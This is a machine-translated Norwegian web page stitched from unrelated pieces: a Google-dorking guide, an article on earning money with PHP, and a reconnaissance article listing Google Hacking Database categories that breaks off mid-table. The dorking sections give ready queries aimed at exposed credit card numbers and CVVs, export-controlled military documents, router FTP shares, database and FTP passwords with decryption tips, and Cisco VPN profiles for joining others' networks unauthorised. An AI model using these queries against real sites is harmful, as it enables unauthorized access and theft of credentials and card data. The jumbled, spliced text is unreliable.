Inurl php http hvilke inntekter. Hvordan tjene penger ved å kunne PHP? Hvordan kan en php-programmerer tjene gode penger hjemme?

Innhenting av private data betyr ikke alltid hacking – noen ganger publiseres det offentlig. Kunnskap om Google-innstillinger og litt oppfinnsomhet vil tillate deg å finne mye interessant – fra kredittkortnumre til FBI-dokumenter.

ADVARSEL

All informasjon gis kun for informasjonsformål. Verken redaktørene eller forfatteren er ansvarlige for mulig skade forårsaket av materialet i denne artikkelen.

I dag er alt koblet til Internett, med liten bekymring for å begrense tilgangen. Derfor blir mange private data søkemotorers bytte. Edderkopproboter er ikke lenger begrenset til nettsider, men indekserer alt innhold som er tilgjengelig på Internett og legger stadig til ikke-offentlig informasjon til databasene deres. Det er enkelt å finne ut disse hemmelighetene - du trenger bare å vite hvordan du spør om dem.

Ser etter filer

I dyktige hender vil Google raskt finne alt som ikke finnes på Internett, for eksempel personlig informasjon og filer til offisiell bruk. De er ofte gjemt som en nøkkel under et teppe: det er ingen reelle tilgangsbegrensninger, dataene ligger rett og slett på baksiden av nettstedet, dit ingen lenker fører. Standard Google-nettgrensesnitt gir bare grunnleggende avanserte søkeinnstillinger, men selv disse vil være tilstrekkelig.

Du kan begrense Google-søket til en bestemt filtype ved å bruke to operatorer: filtype og ext . Den første spesifiserer formatet som søkemotoren bestemte ut fra filtittelen, den andre spesifiserer filtypen, uavhengig av dets interne innhold. Ved søk i begge tilfeller trenger du bare å spesifisere utvidelsen. I utgangspunktet var ext-operatøren praktisk å bruke i tilfeller der filen ikke hadde spesifikke formategenskaper (for eksempel for å søke etter ini- og cfg-konfigurasjonsfiler, som kunne inneholde hva som helst). Nå har Googles algoritmer endret seg, og det er ingen synlig forskjell mellom operatører – i de fleste tilfeller er resultatene de samme.


Filtrering av resultatene

Som standard søker Google etter ord og generelt alle innskrevne tegn i alle filer på indekserte sider. Du kan begrense søkeområdet etter toppnivådomene, et spesifikt nettsted eller etter plasseringen av søkesekvensen i selve filene. For de to første alternativene bruker du nettstedsoperatøren, etterfulgt av navnet på domenet eller det valgte nettstedet. I det tredje tilfellet lar et helt sett med operatører deg søke etter informasjon i tjenestefelt og metadata. For eksempel vil allinurl finne den gitte i selve lenkene, allinanchor - i teksten utstyrt med taggen , allintitle - i sidetitler, allintext - i brødteksten på sidene.

For hver operatør er det en lett versjon med et kortere navn (uten prefikset alle). Forskjellen er at allinurl vil finne lenker med alle ord, og inurl vil bare finne lenker med det første av dem. Det andre og påfølgende ordene fra spørringen kan vises hvor som helst på nettsider. Inurl-operatøren skiller seg også fra en annen operatør med lignende betydning - site. Den første lar deg også finne en hvilken som helst sekvens av tegn i en lenke til det søkte dokumentet (for eksempel /cgi-bin/), som er mye brukt for å finne komponenter med kjente sårbarheter.

La oss prøve det i praksis. Vi tar allintext-filteret og får forespørselen til å produsere en liste over tall og bekreftelseskoder for kredittkort som utløper først om to år (eller når eierne deres blir lei av å mate alle).

Allintext: kortnummer utløpsdato /2017 cvv

Når du leser i nyhetene at en ung hacker "hakket seg inn på serverne" til Pentagon eller NASA, og stjal klassifisert informasjon, snakker vi i de fleste tilfeller om nettopp en slik grunnleggende teknikk for å bruke Google. Anta at vi er interessert i en liste over NASA-ansatte og deres kontaktinformasjon. En slik liste er sikkert tilgjengelig i elektronisk form. For enkelhets skyld eller på grunn av tilsyn, kan det også være på selve organisasjonens nettside. Det er logisk at det i dette tilfellet ikke vil være noen koblinger til det, siden det er ment for intern bruk. Hvilke ord kan være i en slik fil? Som et minimum - "adresse"-feltet. Det er enkelt å teste alle disse forutsetningene.


Inurl:nasa.gov filtype:xlsx "adresse"


Vi bruker byråkrati

Funn som dette er en fin detalj. En virkelig solid fangst er gitt av en mer detaljert kunnskap om Googles operatører for nettredaktører, selve nettverket og særegenhetene ved strukturen til det som søkes. Når du kjenner detaljene, kan du enkelt filtrere resultatene og avgrense egenskapene til de nødvendige filene for å få virkelig verdifulle data i resten. Det er artig at byråkratiet kommer til unnsetning her. Den produserer standardformuleringer som er praktiske for å søke etter hemmelig informasjon som ved et uhell lekkes ut på Internett.

For eksempel betyr distribusjonserklæringsstempelet, som kreves av det amerikanske forsvarsdepartementet, standardiserte restriksjoner på distribusjon av et dokument. Bokstaven A betegner offentlige utgivelser der det ikke er noe hemmelig; B - kun beregnet for internt bruk, C - strengt konfidensielt, og så videre til F. Bokstaven X skiller seg ut separat, som markerer spesielt verdifull informasjon som representerer en statshemmelighet av høyeste nivå. La de som skal gjøre dette på vakt søke etter slike dokumenter, så begrenser vi oss til filer med bokstaven C. I henhold til DoDI-direktivet 5230.24 tildeles denne merkingen dokumenter som inneholder en beskrivelse av kritiske teknologier som faller inn under eksportkontroll. . Du kan finne slik nøye beskyttet informasjon på nettsteder i toppnivådomenet.mil, tildelt den amerikanske hæren.

"DISTRIBUSJONSERKLÆRING C" inurl:navy.mil

Det er veldig praktisk at .mil-domenet bare inneholder nettsteder fra det amerikanske forsvarsdepartementet og dets kontraktsorganisasjoner. Søkeresultater med en domenebegrensning er usedvanlig rene, og titlene taler for seg selv. Å lete etter russiske hemmeligheter på denne måten er praktisk talt ubrukelig: kaos hersker i domains.ru and.rf, og navnene på mange våpensystemer høres ut som botaniske (PP "Kiparis", selvgående våpen "Akatsia") eller til og med fabelaktige ( TOS "Buratino").


Ved å studere ethvert dokument nøye fra et nettsted i .mil-domenet, kan du se andre markører for å avgrense søket. For eksempel en referanse til eksportrestriksjonene "Sec 2751", som også er praktisk for å søke etter interessant teknisk informasjon. Fra tid til annen blir det fjernet fra offisielle nettsteder der det en gang dukket opp, så hvis du ikke kan følge en interessant lenke i søkeresultatene, bruk Googles cache (cache-operator) eller Internet Archive-nettstedet.

Klatre inn i skyene

I tillegg til utilsiktet avklassifiserte offentlige dokumenter, dukker det av og til opp lenker til personlige filer fra Dropbox og andre datalagringstjenester som oppretter "private" lenker til offentlig publiserte data i Googles hurtigbuffer. Det er enda verre med alternative og hjemmelagde tjenester. For eksempel finner følgende spørring data for alle Verizon-kunder som har en FTP-server installert og aktivt bruker ruteren.

Allinurl:ftp:// verizon.net

Det er nå mer enn førti tusen slike smarte mennesker, og våren 2015 var det mange flere av dem. I stedet for Verizon.net kan du erstatte navnet på en hvilken som helst kjent leverandør, og jo mer kjent det er, desto større kan fangsten bli. Gjennom den innebygde FTP-serveren kan du se filer på en ekstern lagringsenhet koblet til ruteren. Vanligvis er dette en NAS for eksternt arbeid, en personlig sky eller en slags peer-to-peer-filnedlasting. Alt innhold på slike medier er indeksert av Google og andre søkemotorer, slik at du kan få tilgang til filer som er lagret på eksterne stasjoner via en direkte lenke.

Ser på konfigurasjonene

Før den utbredte migrasjonen til skyen regjerte enkle FTP-servere som ekstern lagring, som også hadde mange sårbarheter. Mange av dem er fortsatt aktuelle i dag. For eksempel lagrer det populære WS_FTP Professional-programmet konfigurasjonsdata, brukerkontoer og passord i filen ws_ftp.ini. Det er enkelt å finne og lese, siden alle poster lagres i tekstformat, og passord krypteres med Triple DES-algoritmen etter minimal tilsløring. I de fleste versjoner er det tilstrekkelig å forkaste den første byten.

Det er enkelt å dekryptere slike passord ved å bruke WS_FTP Password Decryptor-verktøyet eller en gratis nettjeneste.

Når man snakker om å hacke et vilkårlig nettsted, betyr de vanligvis å få et passord fra logger og sikkerhetskopier av konfigurasjonsfiler for CMS eller e-handelsapplikasjoner. Hvis du kjenner deres typiske struktur, kan du enkelt angi søkeordene. Linjer som de som finnes i ws_ftp.ini er ekstremt vanlige. For eksempel, i Drupal og PrestaShop er det alltid en brukeridentifikator (UID) og et tilsvarende passord (pwd), og all informasjon lagres i filer med filtypen .inc. Du kan søke etter dem på følgende måte:

"pwd=" "UID=" ext:inc

Avsløre DBMS-passord

I konfigurasjonsfilene til SQL-servere lagres brukernavn og e-postadresser i klartekst, og MD5-hashene deres skrives i stedet for passord. Strengt tatt er det umulig å dekryptere dem, men du kan finne en match blant de kjente hash-passord-parene.

Det er fortsatt DBMS-er som ikke engang bruker passordhashing. Konfigurasjonsfilene til en av dem kan enkelt sees i nettleseren.

Intext:DB_PASSWORD filtype:env

Med bruken av Windows-servere ble plassen til konfigurasjonsfilene delvis tatt av registeret. Du kan søke gjennom grenene på nøyaktig samme måte, ved å bruke reg som filtype. For eksempel slik:

Filtype:reg HKEY_CURRENT_USER "Passord"=

La oss ikke glemme det åpenbare

Noen ganger er det mulig å komme til klassifisert informasjon ved å bruke data som ble åpnet ved et uhell og ble kjent med Google. Det ideelle alternativet er å finne en liste over passord i et vanlig format. Bare desperate mennesker kan lagre kontoinformasjon i en tekstfil, et Word-dokument eller et Excel-regneark, men det er alltid nok av dem.

Filtype:xls inurl:passord

På den ene siden er det mange midler for å forhindre slike hendelser. Det er nødvendig å spesifisere tilstrekkelige tilgangsrettigheter i htaccess, lappe CMS, ikke bruke venstrehendte skript og lukke andre hull. Det er også en fil med en liste over robots.txt-unntak som forbyr søkemotorer å indeksere filene og katalogene som er spesifisert i den. På den annen side, hvis strukturen til robots.txt på en server er forskjellig fra standarden, blir det umiddelbart klart hva de prøver å skjule på den.

Listen over kataloger og filer på ethvert nettsted er innledet av standardindeksen for. Siden det for tjenesteformål må vises i tittelen, er det fornuftig å begrense søket til intitle-operatøren. Interessante ting er i katalogene /admin/, /personal/, /etc/ og til og med /secret/.

Følg med for oppdateringer

Relevans er ekstremt viktig her: gamle sårbarheter lukkes veldig sakte, men Google og søkeresultatene endres hele tiden. Det er til og med en forskjell mellom et "siste sekund"-filter (&tbs=qdr:s på slutten av forespørselens URL) og et "sanntids"-filter (&tbs=qdr:1).

Tidsintervallet for datoen for siste oppdatering av filen er også angitt implisitt av Google. Gjennom det grafiske nettgrensesnittet kan du velge en av standardperiodene (time, dag, uke osv.) eller angi et datoområde, men denne metoden egner seg ikke for automatisering.

Fra utseendet til adresselinjen kan du bare gjette om en måte å begrense resultatet av resultater ved å bruke &tbs=qdr:-konstruksjonen. Bokstaven y etter den setter grensen på ett år (&tbs=qdr:y), m viser resultatene for siste måned, w - for uken, d - for siste dag, h - for siste time, n - for minuttet, og s - for gi meg et sek. De siste resultatene som Google nettopp har gjort kjent, er funnet ved å bruke filteret &tbs=qdr:1 .

Hvis du trenger å skrive et smart skript, vil det være nyttig å vite at datointervallet er satt i Google i juliansk format ved hjelp av daterange-operatoren. Slik kan du for eksempel finne en liste over PDF-dokumenter med ordet konfidensielt, lastet ned fra 1. januar til 1. juli 2015.

Konfidensiell filtype:pdf daterange:2457024-2457205

Området er angitt i juliansk datoformat uten å ta hensyn til brøkdelen. Å oversette dem manuelt fra den gregorianske kalenderen er upraktisk. Det er lettere å bruke en datoomformer.

Målretting og filtrering igjen

I tillegg til å spesifisere flere operatorer i søket, kan de sendes direkte i lenkens brødtekst. For eksempel tilsvarer filtype:pdf-spesifikasjonen konstruksjonen as_filetype=pdf . Dette gjør det praktisk å spørre eventuelle avklaringer. La oss si at resultatet av resultater kun fra republikken Honduras spesifiseres ved å legge til konstruksjonen cr=countryHN i søkenettadressen, og bare fra byen Bobruisk - gcs=Bobruisk. Du finner en fullstendig liste i utviklerdelen.

Googles automatiseringsverktøy er utviklet for å gjøre livet enklere, men de legger ofte til problemer. For eksempel bestemmes brukerens by av brukerens IP gjennom WHOIS. Basert på denne informasjonen balanserer Google ikke bare belastningen mellom servere, men endrer også søkeresultatene. Avhengig av regionen, for samme forespørsel, vil forskjellige resultater vises på den første siden, og noen av dem kan være helt skjult. Koden på to bokstaver etter gl=country-direktivet vil hjelpe deg å føle deg som en kosmopolit og søke etter informasjon fra hvilket som helst land. For eksempel er koden til Nederland NL, men Vatikanet og Nord-Korea har ikke sin egen kode i Google.

Ofte blir søkeresultatene rotete selv etter bruk av flere avanserte filtre. I dette tilfellet er det enkelt å avklare forespørselen ved å legge til flere unntaksord til den (et minustegn er plassert foran hver av dem). For eksempel brukes banktjenester, navn og opplæring ofte med ordet personlig. Derfor vil renere søkeresultater ikke vises av et lærebokeksempel på et søk, men av et raffinert:

Intitle:"Indeks for /Personlig/" -navn -opplæring -bank

Et siste eksempel

En sofistikert hacker kjennetegnes ved at han forsyner seg selv med alt han trenger på egen hånd. For eksempel er VPN en praktisk ting, men enten dyrt eller midlertidig og med restriksjoner. Å tegne et abonnement for deg selv er for dyrt. Det er bra at det finnes gruppeabonnement, og ved hjelp av Google er det enkelt å bli en del av en gruppe. For å gjøre dette, finn bare Cisco VPN-konfigurasjonsfilen, som har en ganske ikke-standard PCF-utvidelse og en gjenkjennelig bane: Program Files\Cisco Systems\VPN Client\Profiles. En forespørsel og du blir med, for eksempel, det vennlige teamet ved universitetet i Bonn.

Filtype:pcf vpn ELLER Gruppe

INFO

Google finner passordkonfigurasjonsfiler, men mange av dem er kryptert eller erstattet med hashes. Hvis du ser strenger med fast lengde, kan du umiddelbart se etter en dekrypteringstjeneste.

Passord lagres kryptert, men Maurice Massard har allerede skrevet et program for å dekryptere dem og gir det gratis gjennom thecampusgeeks.com.

Google kjører hundrevis av forskjellige typer angrep og penetrasjonstester. Det er mange alternativer, som påvirker populære programmer, store databaseformater, mange sårbarheter i PHP, skyer og så videre. Å vite nøyaktig hva du leter etter vil gjøre det mye lettere å finne informasjonen du trenger (spesielt informasjon du ikke hadde til hensikt å offentliggjøre). Shodan er ikke den eneste som mater med interessante ideer, men hver database med indekserte nettverksressurser!

Fra forfatteren: Hei venner! I denne artikkelen vil vi snakke om programmeringsspråket PHP. La oss finne ut hva den brukes til, hva du kan gjøre med den, og hvilken plass den inntar i stadiene av nettstedutvikling. Også i denne artikkelen vil vi se på mange måter å tjene penger på å vite hvordan man programmerer i PHP.

Hva er PHP og hva er det for?

PHP er et skriptspråk som brukes veldig aktivt i utviklingen av webapplikasjoner. PHP er et av de ledende språkene som brukes til å utvikle dynamiske nettsteder.

PHP er et programmeringsspråk på serversiden. Alle skript skrevet på dette språket kjøres på serveren med nettstedet. For å studere PHP, utvikle og feilsøke nettsteder og skript, trenger du selvfølgelig ikke kjøpe en ekte server på Internett. For disse formålene brukes serveremulatorer, som i form av programmer ganske enkelt installeres på en fungerende datamaskin. Og på en server på Internett (hosting) plasseres ferdige nettsider og sider med PHP-skript. Forresten, nesten all moderne hosting støtter PHP-språket.

Populariteten til dette språket innen nettstedbygging bestemmes av tilstedeværelsen av et stort sett med innebygde verktøy for utvikling av webapplikasjoner. De viktigste:

automatisk utvinning av POST- og GET-parametere, samt webservermiljøvariabler til forhåndsdefinerte arrays;

interaksjon med et stort antall forskjellige databasebehandlingssystemer (MySQL, MySQLi, SQLite, PostgreSQL, Oracle (OCI8), Oracle, Microsoft SQL Server, Sybase, ODBC, mSQL, IBM DB2, Cloudscape og Apache Derby, Informix, Ovrimos SQL, Lotus Notes , DB++, DBM, dBase, DBX, FrontBase, FilePro, Ingres II, SESAM, Firebird / InterBase, Paradox File Access, MaxDB, PDO Interface);

automatisert sending av HTTP-hoder;

arbeide med informasjonskapsler og økter;

arbeider med lokale og eksterne filer, sockets;

behandle filer lastet opp til serveren;

arbeider med XForms.

La oss se på et eksempel hvor PHP-skriptet kjører på siden. Ta for eksempel abonnementsskjemaet der du skriver inn navn og e-post på mange nettsteder. HTML og CSS er ansvarlige for utseendet til skjemaet - fargene på inndatafeltene og knappene, endre fargen på knappen når du svever og klikker på den, og så videre. Ved hjelp av HTML5 kan du sjekke riktigheten av dataene som er lagt inn i skjemaet – for eksempel om e-post- eller telefonfeltene er riktig fylt ut.

Og etter at du har klikket på "Abonner"-knappen, kalles et PHP-skript, som mottar dataene du skrev inn i skjemaet. Skriptet registrerer dem i databasen, genererer og sender deg en lenke for å bekrefte abonnementet på e-posten som er spesifisert i skjemaet, sjekker abonnementsbekreftelsen og sender deg påfølgende e-poster. Alle disse operasjonene utføres på serveren, og dette gjøres ved hjelp av programmeringsspråket PHP.

Anvendelse av PHP i nettstedutvikling

For å lage et nettsted må du gå gjennom flere stadier:

Planlegger. På dette stadiet planlegger vi det fremtidige nettstedet: for hvem og hvorfor lager vi det, hvem som vil besøke nettstedet, hva vi skal fylle det med, hva som skal være på nettstedet, og så videre.

Design. På designstadiet skaper vi utseendet til nettstedsidene i en grafisk editor.

Oppsett. På layoutstadiet, ved å bruke HTML og CSS, lager vi HTML-sidene til det fremtidige nettstedet fra layoutene som ble oppnådd på designstadiet.

Programmering. På programmeringsstadiet automatiserer vi prosessene for å jobbe med nettstedet. Vi programmerer den administrative delen av siden (adminpanelet) slik at du kan legge til, slette, redigere eksisterende sider selv for en person som ikke er helt kjent med nettsidebygging. Vi programmerer slik at søket og alle abonnementsskjemaer (hvis noen) på siden fungerer. Vi sørger for at den nylig lagt til siden vises på siden, og en lenke til den opprettede siden vises automatisk i menyen. Hvis nettstedet bruker stemmegivning eller en spørreundersøkelse, er alt dette også programmert i PHP, på programmeringsstadiet.

Hvis vi vurderer stadiet med å programmere et større nettsted, for eksempel en nettbutikk, er alt her enda bredere og mer interessant. I dette tilfellet legger vi ikke bare til sider, men også produkter - hovedinnholdet i nettbutikken. I administrasjonspanelet må du dessuten gi en oversikt over lagt til produkter i ulike kategorier. Det skal også være mulig å redigere produktet, endre beskrivelse, pris, bilde osv.

I tillegg krever en nettbutikk programmering av et analysesystem – slik at du i adminpanelet kan se hvor mange bestillinger som ble lagt inn og betalt, for hvilket beløp, og hvilke produkter som ble betalt for fra hvilke kategorier osv. Dessuten bør det være mulig å vise slike rapporter for ulike perioder. Ved programmering av nettbutikk implementeres ofte også salgsrapportering for regnskaps- og skatteformål.

Det er grunnen til at stadiet der PHP-programmeringsspråket brukes, er det viktigste, det lengste når det gjelder tid, og det dyreste og mest betalte innen nettstedsutvikling. Og når du først forstår hvordan du programmerer en nettbutikk, vil du kunne lage skript for et nettsted av nesten hvilken som helst kompleksitet.

Populariteten til PHP

Populariteten til PHP er bevist av det faktum at det brukes av 83,1% av alle nettsteder der det var mulig å identifisere et programmeringsspråk på serversiden.

Alle de mest populære CMS-ene som inntar førsteplasser i popularitetsvurderinger (både betalt og gratis: WordPress, Joomla, Drupal, Modx, Bitrix. Magento, etc.) er skrevet i PHP-programmeringsspråket.

Også populariteten til PHP-programmeringsspråket er bevist av de mange opprettede PHP-rammeverkene, som Laravel, Yii, CakePHP, Slim, Zend Framework 2, PHPixie, CodeIgniter, Symfony 2 og andre. Det er et stort antall fora og store fellesskap - for PHP generelt, for hvert rammeverk og for hvert CMS separat.
Jeg vil også legge til at verdens største nettsteder, for eksempel Facebook, Wikipedia, også er skrevet i PHP.

Hvordan kan du tjene penger med kunnskap om PHP?

Gitt populariteten til PHP, er det en konstant høy etterspørsel etter PHP-programmerere. Å ha kunnskap om PHP og kunne programmere på dette språket vil åpne for nye muligheter for å tjene penger. La oss se på de viktigste som du virkelig kan tjene penger med i dag:

Tjene penger ved å utvikle skript. Alle nettsteder er i stadig utvikling, og de krever med jevne mellomrom skriving av nye skript, eller utvikling av tilleggsfunksjonalitet, moduler osv. For slike utviklinger henvender nettstedeiere seg til PHP-utviklere. Dessuten kan du i dette tilfellet tjene penger på to måter:

spore bestillinger for å finne en frilansutvikler;

generere ideer til massemanus. Når du har en idé til et skript som definitivt vil være etterspurt blant for eksempel eiere av nettbutikker, kan du uavhengig utvikle et slikt skript og selge det til nettbutikkeiere;

Ferdigstillelse av ferdige skript "på bestilling". Alt er enkelt her - du tar på deg modifikasjon eller korrigering av et skript. Men i dette tilfellet er det en nyanse - til å begynne med er kanskje manuset ikke veldig bra, og det kan ta mer tid å foredle det enn å skrive et manus fra bunnen av. Derfor, hvis du bruker denne metoden for å tjene penger, må du først se veldig nøye på hva du skal endre og fullføre.

Utvikling av plugins for CMS. I denne metoden er alt det samme som når man tjener penger på skript. Ofte krever nettsteder opprettet på ferdige CMS å skrive en slags plugin, tillegg eller utvidelse. Og du kan tjene penger her på to måter:

spore bestillinger for utvikling av plugins, tillegg og utvidelser på frilansbasis;

utvikle og selge en masseplugin som definitivt vil være etterspurt på de fleste nettsteder;

Egne og felles prosjekter. Hvis du har en idé til et Internett-prosjekt (oppstart), for eksempel en idé til en nyttig tjeneste eller applikasjon som kan løse et spesifikt problem, kan du begynne å implementere det. I det innledende stadiet kan det til og med være bare som en hobby, i tillegg til hovedjobben. Så, når det er klart at hobbyen vokser til et stort prosjekt, vil det være mulig å vie mer tid til den.

Oppretting av dynamiske nettsider og motorer for dem. Du kan også tjene gode penger ved å utvikle tilpassede nettsider, jobbe som frilanser eller i et nettstudio.

Opprette nettsider for deg selv. Du kan lage et nettsted for deg selv, fylle det med nyttig innhold - og når nettstedet har et tilstrekkelig antall besøkende, begynne å tjene penger ved å plassere betalt annonsering på det eller promotere noens produkter gjennom tilknyttede programmer.

Jeg tror mange av dere har tenkt at alle de ovennevnte metodene for å tjene penger kan kombineres. Og det er riktig! Du kan lage et nettsted for deg selv og passivt tjene penger ved å selge reklame fra det, pluss lage et skript eller plugin og selge det på spesialiserte nettsteder, tjene penger på autopilot fra hvert salg, og samtidig kan du fortsatt jobbe på et nett studio. Hvorfor ikke? Selvfølgelig kan du!

Hvor mye kan en PHP-utvikler tjene?

Med inntektene til PHP-programmerere er alt individuelt. Mye her avhenger av hvor man skal jobbe, hvordan man jobber, hvilket kunnskapsnivå, hvilken erfaring, kvalifikasjoner, hvilken relatert tilleggskunnskap utvikleren har, og så videre. Derfor kan det i prinsippet ikke være noe eksakt tall her. Men vi kan se på hvilken lønn som tilbys når du søker etter PHP-programmerere i et webstudio, og hvor mye de er villige til å betale for et prosjekt på frilansbørser.

Bildet nedenfor viser foreslått lønn for PHP-programmerere i et webstudio. Dessuten er dette lønnen for PHP-programmerere uten arbeidserfaring:

Har du arbeidserfaring kan du tjene mye mer. Nedenfor er lønnen som tilbys til erfarne PHP-programmerere.

Og i dag kan du også tjene anstendige penger på frilansing:

Konklusjon

PHP er det mest populære programmeringsspråket blant webutviklere. De aller fleste av alle nettsider på Internett er skrevet i PHP. Med kunnskap og evne til å utvikle deg i dette programmeringsspråket kan du tjene gode penger, og det er mange muligheter for å tjene penger – fra å jobbe i et webstudio til å utvikle ditt eget prosjekt eller oppstart.

Ethvert søk etter sårbarheter på nettressurser begynner med rekognosering og informasjonsinnsamling.
Intelligens kan enten være aktiv - brute force av filer og kataloger på nettstedet, kjøre sårbarhetsskannere, manuelt surfe på nettstedet, eller passivt - søke etter informasjon i forskjellige søkemotorer. Noen ganger hender det at en sårbarhet blir kjent allerede før du åpner den første siden på nettstedet.

Hvordan er dette mulig?
Søkeroboter, som konstant streifer rundt på Internett, i tillegg til informasjon som er nyttig for den gjennomsnittlige brukeren, registrerer ofte ting som kan brukes av angripere til å angripe en nettressurs. For eksempel skriptfeil og filer med sensitiv informasjon (fra konfigurasjonsfiler og logger til filer med autentiseringsdata og databasesikkerhetskopier).
Fra synspunktet til en søkerobot er en feilmelding om å utføre en sql-spørring ren tekst, uatskillelig, for eksempel fra beskrivelsen av produktene på siden. Hvis plutselig en søkerobot kom over en fil med filtypen .sql, som av en eller annen grunn havnet i nettstedets arbeidsmappe, vil den bli oppfattet som en del av nettstedets innhold og vil også bli indeksert (inkludert, muligens, passordene spesifisert i den).

Slik informasjon kan bli funnet ved å kjenne til sterke, ofte unike, søkeord som hjelper til med å skille "sårbare sider" fra sider som ikke inneholder sårbarheter.
En enorm database med spesielle forespørsler som bruker nøkkelord (såkalte dorks) finnes på exploit-db.com og er kjent som Google Hack Database.

Hvorfor google?
Dorks er først og fremst rettet mot Google av to grunner:
− den mest fleksible syntaksen for nøkkelord (vist i tabell 1) og spesialtegn (vist i tabell 2);
− Google-indeksen er fortsatt mer komplett enn for andre søkemotorer;

Tabell 1 - Hovedsøkeord fra Google

Nøkkelord
Betydning
Eksempel
nettstedet
Søk kun på det angitte nettstedet. Tar kun hensyn til url
site:somesite.ru - vil finne alle sider på et gitt domene og underdomener
inurl
Søk etter ord som finnes i uri. I motsetning til cl. ord "side", søker etter treff etter nettstedsnavnet
inurl:news - finner alle sider der det gitte ordet vises i urien
intekst
Søk i brødteksten på siden
intext:"traffic jams" - helt lik den vanlige forespørselen om "trafikkkorker"
intitle
Søk i sidetittelen. Tekst mellom tagger <br></td> <td width="214">intitle:”indeks av” - finner alle sider med katalogoppføringer <br></td> </tr><tr><td width="214">ext <br></td> <td width="214">Søk etter sider med en spesifisert utvidelse <br></td> <td width="214">ext:pdf - finner alle pdf-filer <br></td> </tr><tr><td width="214">filtype <br></td> <td width="214">Foreløpig helt lik klasse. ordet "ext" <br></td> <td width="214">filtype:pdf - lignende <br></td> </tr><tr><td width="214">i slekt <br></td> <td width="214">Søk etter nettsteder med lignende emner <br></td> <td width="214">related:google.ru - vil vise sine analoger <br></td> </tr><tr><td width="214">link <br></td> <td width="214">Søk etter nettsteder som lenker til dette <br></td> <td width="214">link:somesite.ru - vil finne alle nettsteder som har en lenke til dette <br></td> </tr><tr><td width="214">definere <br></td> <td width="214">Vis orddefinisjon <br></td> <td width="214">define:0day - definisjon av begrepet <br></td> </tr><tr><td width="214">cache <br></td> <td width="214">Vis sideinnhold i cache (hvis tilgjengelig) <br></td> <td width="214">cache:google.com - vil åpne en bufret side <br></td> </tr></tbody></table><p>Tabell 2 - Spesialtegn for Google-søk <br></p><table><tbody><tr><td width="214"><b>Symbol</b><br></td> <td width="214"><b>Betydning</b><br></td> <td width="214"><b>Eksempel</b><br></td> </tr><tr><td width="214">“<br></td> <td width="214">Nøyaktig setning <br></td> <td width="214">intitle:"RouterOS-ruterkonfigurasjonsside" - søk etter rutere <br></td> </tr><tr><td width="214">*<br></td> <td width="214">Enhver tekst <br></td> <td width="214">inurl: "bitrix*mcart" - søk etter nettsteder på bitrix med en sårbar mcart-modul <br></td> </tr><tr><td width="214">.<br></td> <td width="214">Hvilken som helst karakter <br></td> <td width="214">Index.of - ligner på indeksen for forespørsel <br></td> </tr><tr><td width="214">-<br></td> <td width="214">Slett et ord <br></td> <td width="214">error -warning - vis alle sider som har en feil, men ingen advarsel <br></td> </tr><tr><td width="214">..<br></td> <td width="214">Område <br></td> <td width="214">cve 2006..2016 - vis sårbarheter etter år fra og med 2006 <br></td> </tr><tr><td width="214">|<br></td> <td width="214">Logisk "eller" <br></td> <td width="214">linux | vinduer - viser sider der enten det første eller andre ordet forekommer <br></td> </tr></tbody></table><br>Det er verdt å forstå at enhver forespørsel til en søkemotor er et søk bare etter ord. <br>Det nytter ikke å lete etter metategn på siden (anførselstegn, parenteser, skilletegn osv.). Selv et søk etter den eksakte setningen spesifisert i anførselstegn er et ordsøk, etterfulgt av et søk etter et eksakt samsvar i resultatene. <p>Alle Google Hack Database-dorks er logisk delt inn i 14 kategorier og presenteres i tabell 3. <br>Tabell 3 – Google Hack Database Kategorier <br></p><table><tbody><tr><td width="168"><b>Kategori</b><br></td> <td width="190"><b>Hva lar deg finne</b><br></td> <td width="284"><b>Eksempel</b><br></td> </tr><tr><td width="168">Fotfester <br></td> <td width="190">Web-skjell, offentlige filbehandlere <br></td> <td width="284">Finn alle hackede nettsteder der de oppførte webskallene er lastet opp: <br>(intitle:"phpshell" ELLER intitle:"c99shell" ELLER intitle:"r57shell" ELLER intitle:"PHP Shell" ELLER intitle:"phpRemoteView") `rwx` "uname" <br></td> </tr><tr><td width="168">Filer som inneholder brukernavn <br></td> <td width="190">Registerfiler, konfigurasjonsfiler, logger, filer som inneholder historikken til innlagte kommandoer <br></td> <td width="284">Finn alle registerfiler som inneholder kontoinformasjon: <br><i>filetype:reg reg +intext:"internet account manager"</i><br></td> </tr><tr><td width="168">Sensitive kataloger <br></td> <td width="190">Kataloger med forskjellig informasjon (personlige dokumenter, vpn-konfigurasjoner, skjulte depoter, etc.) <br></td> <td width="284">Finn alle katalogoppføringer som inneholder VPN-relaterte filer: <br><i>"Config" intitle:"Indeks av" intext:vpn</i><br>Nettsteder som inneholder git-repositories: <br><i>(intext:"indeks av /.git") ("overordnet katalog")</i><br></td> </tr><tr><td width="168">Webserverdeteksjon <br></td> <td width="190">Versjon og annen informasjon om webserveren <br></td> <td width="284">Finn administrative konsoller for JBoss server: <br><i>inurl:"/web-console/" intitle:"Administrasjonskonsoll"</i><br></td> </tr><tr><td width="168">Sårbare filer <br></td> <td width="190">Skript som inneholder kjente sårbarheter <br></td> <td width="284">Finn nettsteder som bruker et skript som lar deg laste opp en vilkårlig fil fra serveren: <br><i>allinurl:forcedownload.php?file=</i><br></td> </tr><tr><td width="168">Sårbare servere <br></td> <td width="190">Installasjonsskript, web-skall, åpne administrative konsoller, etc. <br></td> <td width="284">Finn åpne PHPMyAdmin-konsoller som kjører som root: <br><i>intitle:phpMyAdmin "Velkommen til phpMyAdmin ***" "kjører på * som root@*"</i><br></td> </tr><tr><td width="168">Feilmeldinger <br></td> <td width="190">Ulike feil og advarsler avslører ofte viktig informasjon – fra CMS-versjon til passord <br></td> <td width="284">Nettsteder som har feil ved utføring av SQL-spørringer til databasen: <br><i>"Advarsel: mysql_query()" "ugyldig spørring"</i><br></td> </tr><tr><td width="168">Filer som inneholder saftig informasjon <br></td> <td width="190">Sertifikater, sikkerhetskopier, e-poster, logger, SQL-skript, etc. <br></td> <td width="284">Finn initialisering sql-skript: <br><i>filtype:sql og "sett inn i" -site:github.com</i><br></td> </tr><tr><td width="168">Filer som inneholder passord <br></td> <td width="190">Alt som kan inneholde passord - logger, sql-skript, etc. <br></td> <td width="284">Logger som nevner passord: <br><i>filtype:</i><i>Logg</i><i>intext:</i><i>passord |</i><i>pass |</i><i>pw</i><br>sql-skript som inneholder passord: <br><i>ext:</i><i>sql</i><i>intext:</i><i>brukernavn</i><i>intext:</i><i>passord</i><br></td> </tr><tr><td width="168">Sensitiv informasjon om netthandel <br></td> <td width="190">Informasjon knyttet til nettkjøp <br></td> <td width="284">Finn pinkoder: 